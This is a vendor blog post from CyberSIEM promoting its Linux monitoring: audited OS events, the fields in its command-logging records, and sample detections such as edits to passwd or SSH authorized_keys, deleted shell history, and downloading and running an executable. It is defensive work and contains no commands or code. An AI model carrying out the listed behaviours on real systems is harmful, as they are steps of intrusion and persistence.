Leave us a Message:

Advanced Linux threats Monitoring

Share on facebook
Share on linkedin
Share on twitter
Share on whatsapp
Share on email
Linux monitoring by CyberSIEM

In this article, we will discuss Unix\Linux’s standard Monitoring capabilities and will present CyberSIEM’s unique developments that expand and upgrade Linux Monitoring Capabilities. These capabilities are being deployed at our customer’s monitored environment.


TrendMicro’s article “A Look at Linux”, discusses how Linux has become an attractive target for attackers, as well as how it is prone to a variety of threats and risks. The authors discuss a few main risks and threats including vulnerabilities, misconfigurations and security gaps, and malware.

Linux monitoring by CyberSIEM

The total number of publicly exposed FTP servers according to a Shodan search performed on January 5, 2021

As part of the increasing demand for visibility of the organization systems, some of the most significant black holes are the Linux\Unix activities and the ability to track them.

A large portion of the core components and critical systems in the organization will have a Linux operating system, for example:

Network components – Switches/routers FW \ IPS \ WAF

Virtualization – Vmware \ ESX \ Dockers

At CyberSIEM, we have taken the essential data at all levels and developed unique new monitoring capabilities (Linux CLI).

OS Audit :

  • Change passwords of existing accounts
  • Unlock or un-expire locked or expired accounts
  • Create new accounts
  • Delete accounts
  • Delete log files
  • Change log files
  • Delete or change system configuration files
  • USB Drive connections 
  • Mount activities


Linux CLI:

We have developed a unique capability of collecting all the user’s commands that run on the operating system and receive them in the SIEM system with a log enriched with a lot of additional information. This allows us to provide our customers with a much more robust defense capability in addition to OS AUDIT:

Each Log will supply the following fields:

  1. Time
  2. Server name
  3. Username
  4. Command
  5. Execution path
  6. Operating system type
  7. SSH session
  8. SSH source address
  9. SSH source hostname
  10. Source Port 
  11. Destination port


A few additional examples for monitoring capabilities developed by CyberSIEM’s team and are used by our Customers::

  1. Dealing with ‘aliases’ file.
  2. Dealing with ‘passwd’ file.
  3. Dealing with SSH ‘authorization_keys’ file.
  4. History commands were deleted.
  5. The user created a simple HTTP server using Python.
  6. The user downloaded and ran an execution file
  7. from the Internet.

Visit our Blog to read more about our Developments & Use Cases

and Subscribe to our newsletter to stay updated with new insights and news

Share this post

Share on facebook
Share on linkedin
Share on twitter
Share on whatsapp
Share on email
Kfir Ozeri

Kfir Ozeri

Leave a Reply

About Us

We increase the security of organizational information and anticipate threats before they cause damage, and improve the level of protection of organizational information, by providing end-to-end SIEM solution.

Recent Posts

Skip to content